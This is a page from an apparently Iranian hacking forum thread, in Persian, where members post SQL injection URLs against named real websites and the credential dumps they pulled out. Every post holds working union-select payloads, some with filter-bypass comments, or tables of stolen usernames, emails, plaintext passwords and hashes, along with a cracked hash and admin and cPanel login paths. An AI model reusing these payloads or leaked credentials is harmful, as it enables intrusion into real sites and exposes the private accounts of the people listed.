پرش به


تصویر

دیتابیس سایت های مورد نفوذ قرار گرفته (خارجی)

اختصاصی

 • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
197 پاسخ برای این موضوع

#141 ارسالی 24 اوت 2016 - 11:46

Danger BoY
+2,383
  ONLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 479 ارسال
  Last Visit 4 دقیقه قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Just Danger BoY
http://adw.com.sa/page.php?p=3+order+by+6--

http://adw.com.sa/page.php?p=-3+union+select+1,2,3,4,5,6--

http://adw.com.sa/page.php?p=-3+union+select+1,2,version%28%29,4,5,6--

http://adw.com.sa/page.php?p=-3+union+select+1,2,group_concat%28table_name%29,4,5,6+from+information_schema.tables--

---------------------------------------------------------------------

http://adw.com.sa/page.php?p=-3+union+select+1,2,group_concat%28column_name%29,4,5,6+from+information_schema.columns+where+table_name=0x6D6E735F7573657273--

http://adw.com.sa/page.php?p=-3+union+select+1,2,group_concat%28un,0x3a,pw%29,4,5,6+from+mns_users--


image.gif
Iranonymous Security Team

Danger BoY

++++++++++++++++++++++++++++++++
https://telegram.me/Per_Def
+++++++++++++++++++++++++++++++++
banner-1.gifmahak%282%29%28pr8.ir%29.gif


#142 ارسالی 25 اوت 2016 - 11:32

  OFFLINE
  تاریخ عضویت :
  15 ژوئیه 2016
 • %100██████████
 • VIP
 • 125 ارسال
  Last Visit یک هفته قبل
 • Country :
 • Gender : Male
 • Location : Munykh
 • Name : Black
http://galaxy.sa
http://galaxy.sa/Sales/product.php?id=-201%27+/*!50000union*/%20select+1,0x496e6a656354656420427920426c34636b205734726e696e67202d204972616e6f6e796d6f75732e6f7267,3,/*!50000GrOUp_COncAt%28username,0x3a,password%29*/,5,6,7,8,9,10+from+admins--+
galaxy1615:sales1615

مرگ بر عربستان


تصویر

I'm Bl4ck W4rning

I'm Iranian

I'm Anonymous

--------------------------------

ANONYMOUS IS LEGION


WE DO NOT FORGET - WE DO NOT FORGIVE


EXPECT US


#143 ارسالی 08 سپتامبر 2016 - 12:59

Ormazd
+1,687
  OFFLINE
  تاریخ عضویت :
  24 دسامبر 2015
 • ORMAZD
 • Super Moderator
 • 291 ارسال
  Last Visit فوریه 04 2017 11:38
 • Country :
 • Gender : Male

تارگت :

http://www.camsun.ae

لینک اینجکت :

http://www.camsun.ae/product.php?id=-105%27%20union%20select%201,/*!50000grOup_conCat(username,0x3a,password)*/,3,4,5,6,7,8,9/*!50000from*/admin--+

یوزر و پس :

4a98f514a2955363371b7e839cd04e2e:5e299338fa769ac3d97f7df5adae0d1d

پنل ادمین :

http://www.camsun.ae/admin/

به خیالشون که این تاج سرشونه تا همیشه
یادشون رفته که اون شاه که به صد مهره نمی باخت
تاج رو از سرش تو میدون لشکر پیاده انداخت
اونکه مارو بازی میده
اونیکه مهره رو چیده
اونیکه نه شاه نه سرباز
نه سیاه...........نه سفیده
از پس پرده نگاه کن


#144 ارسالی 13 سپتامبر 2016 - 11:18

Danger BoY
+2,383
  ONLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 479 ارسال
  Last Visit 4 دقیقه قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Just Danger BoY

http://www.nootancol...22 order by 5--

http://www.nootancol...ect 1,2,3,4,5--

http://www.nootancol...version(),4,5--

http://www.nootancol...atabase(),4,5--

http://www.nootancol...schema.tables--

+++++++++++++++++++++++++++++++++++++++++++

http://www.nootancol...=0x7573657273--

http://www.nootancol...,5 from users--


image.gif
Iranonymous Security Team

Danger BoY

++++++++++++++++++++++++++++++++
https://telegram.me/Per_Def
+++++++++++++++++++++++++++++++++
banner-1.gifmahak%282%29%28pr8.ir%29.gif


#145 ارسالی 21 سپتامبر 2016 - 12:59

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 594 ارسال
  Last Visit 6 روز قبل
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

تارگت :

http://crarental.org

اینجکت :

http://crarental.org/event.php?id=-18+UNION+SELECT+1,0x496e6a656374656420427920426c61636b776f6c665f4972616e,3,4,5,6,7,8,9,(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(users)%20where%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e206964203a20,id,0x3c666f6e7420636f6c6f723d626c75653e20456d61696c203a20,email,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password,0x3a,salt))))x),11,12,13,14,15,16,17,18,19--+
Injected By Blackwolf_Iran


id : 3 Email : [email protected] Password : 055ef6eac6ecacd96c7552a237d05bb4c6e3f7b634dd6ee1875a3f6335252000:1251d87741bc9c1d
id : 5 Email : [email protected] Password : 2ea3cf6909014bbf7cd89bba8866e760d3e8b441b7af1cd9b607d2aa455de8fe:3a5c3f23e58617
id : 6 Email : [email protected] Password : 53d042b3f8749a424a497ff3f921d1c949a06a6ea94e7e30e8f98dec2b3421f5:61180d8038023456

موفق باشید. =)


دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..::Blackwolf_Iran::..

------------------------------------------------------------------------------------------------------------------------------------------------------

:ph34r: Anonymous Security Team :ph34r:

تصویر


#146 ارسالی 25 سپتامبر 2016 - 06:39

Danger BoY
+2,383
  ONLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 479 ارسال
  Last Visit 4 دقیقه قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Just Danger BoY

http://www.nootancol...22 order by 5--

http://www.nootancol...ect 1,2,3,4,5--

http://www.nootancol...version(),4,5--

http://www.nootancol...atabase(),4,5--

http://www.nootancol...schema.tables--

+++++++++++++++++++++++++++++++++++++++++++

http://www.nootancol...=0x7573657273--

http://www.nootancol...,5 from users--


image.gif
Iranonymous Security Team

Danger BoY

++++++++++++++++++++++++++++++++
https://telegram.me/Per_Def
+++++++++++++++++++++++++++++++++
banner-1.gifmahak%282%29%28pr8.ir%29.gif


#147 ارسالی 27 سپتامبر 2016 - 05:35

ArminTanha
+275
  OFFLINE
  تاریخ عضویت :
  04 سپتامبر 2016
 • %70███████▒▒▒
 • Anonymous
 • 71 ارسال
  Last Visit اكتبر 20 2016 09:20
 • Country :
 • Gender : Male
 • Location : Deutschland
 • Name : Armin
http://c2-europe.eu/
+----+------------------+-------+----------+----------+
| id | name           | email | username | password |
+----+------------------+-------+----------+----------+
| 2| Michael Boyle  | NULL| michael| 5ejufe |
| 3| Franz Hermann  | NULL| franz  | ba3uju |
| 4| Nora Hermann   | NULL| nora   | v6xup3 |
| 5| Seb Ulkan      | NULL| seb    | t2e5ab |
| 6| Rod Abbott     | NULL| rod    | ga3ra4 |
| 7| Nadine Gebauer | NULL| nadine | 6uraha |
| 8| Benedikt Hofmann | NULL| benedikt | t8wup3 |
+----+------------------+-------+----------+----------+

ویرایش شده توسط ArminTanha 27 سپتامبر 2016 - 07:04 .

AT-Plus


#148 ارسالی 27 سپتامبر 2016 - 05:36

ArminTanha
+275
  OFFLINE
  تاریخ عضویت :
  04 سپتامبر 2016
 • %70███████▒▒▒
 • Anonymous
 • 71 ارسال
  Last Visit اكتبر 20 2016 09:20
 • Country :
 • Gender : Male
 • Location : Deutschland
 • Name : Armin
+------------------------------------------+-----------+-------------------------+
| user_pass                              | user_name | user_email            |
+------------------------------------------+-----------+-------------------------+
| a1fba67e72b37d0ba83c2cc937172ec8eb1fda6d | admin   | [email protected] |
| b404bbb52c91fe1f291ba9c2719aa7d916dc55e5 | Jim     | [email protected]        |
| 3a5fbfe524ec4319455769d5462eb2c4ac4cbe79 | rusty   | [email protected] |
+------------------------------------------+-----------+-------------------------+
bible-history.com

AT-Plus


#149 ارسالی 27 سپتامبر 2016 - 05:38

ArminTanha
+275
  OFFLINE
  تاریخ عضویت :
  04 سپتامبر 2016
 • %70███████▒▒▒
 • Anonymous
 • 71 ارسال
  Last Visit اكتبر 20 2016 09:20
 • Country :
 • Gender : Male
 • Location : Deutschland
 • Name : Armin
+---------+-----------+------------+----------------------------------+-------------+-------------+---------------+----------------+
| user_id | user_nom| user_login | user_psswd                     | user_profil | user_prenom | user_civilite | user_date_crea |
+---------+-----------+------------+----------------------------------+-------------+-------------+---------------+----------------+
| 1     | admin   | admin    | 6bf03fe4088455cf61249ff511f4dcaa | <blank>   | admin     | <blank>     | 1421544579   |
| 2     | super   | paulleon | 191999861c7979a5ea605f1961d76464 | <blank>   | root      | <blank>     | 1159840018   |
| 16    | Boutersky | sandrine | 2892d4e4545dec880d4f77edf88d4501 | <blank>   | Sandrine  | <blank>     | 1421916355   |
| 19    | eavt    | eavt     | ee6a3b72df41f7ca1f46e427fa5e1ab2 | <blank>   | eavt      | <blank>     | 1436524573   |
+---------+-----------+------------+----------------------------------+-------------+-------------+---------------+----------------+

site:www.marnelavallee.archi.fr

Hash Cracked

6bf03fe4088455cf61249ff511f4dcaa:MlVaBb!

AT-Plus


#150 ارسالی 27 سپتامبر 2016 - 07:03

ArminTanha
+275
  OFFLINE
  تاریخ عضویت :
  04 سپتامبر 2016
 • %70███████▒▒▒
 • Anonymous
 • 71 ارسال
  Last Visit اكتبر 20 2016 09:20
 • Country :
 • Gender : Male
 • Location : Deutschland
 • Name : Armin
Database: alvi17_shadil14
Table: user_info
[5 entries]
+---------+----------+--------------+------------------------------------------+
| user_id | username | user_regdate | user_password                          |
+---------+----------+--------------+------------------------------------------+
| 9     | admin  | 1323874422 | d033e22ae348aeb5660fc2140aec35850c4da997 |
| 10    | ehtesham | 0          | d033e22ae348aeb5660fc2140aec35850c4da997 |
| 11    | tanzeem| 0          | d033e22ae348aeb5660fc2140aec35850c4da997 |
| 12    | salman | 0          | fb2628eb37e4bc3e3e121217aa1c6cc148794a85 |
| 13    | asim   | 0          | 87c38b4cca9f27c85e539edd8c62a9aa18bb384a |
+---------+----------+--------------+------------------------------------------+
shadilawn.com

cPanel Login

shadilawn.com/controlpanel/

AT-Plus


همچنین به اختصاصی نیز برچسب خورده است

0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP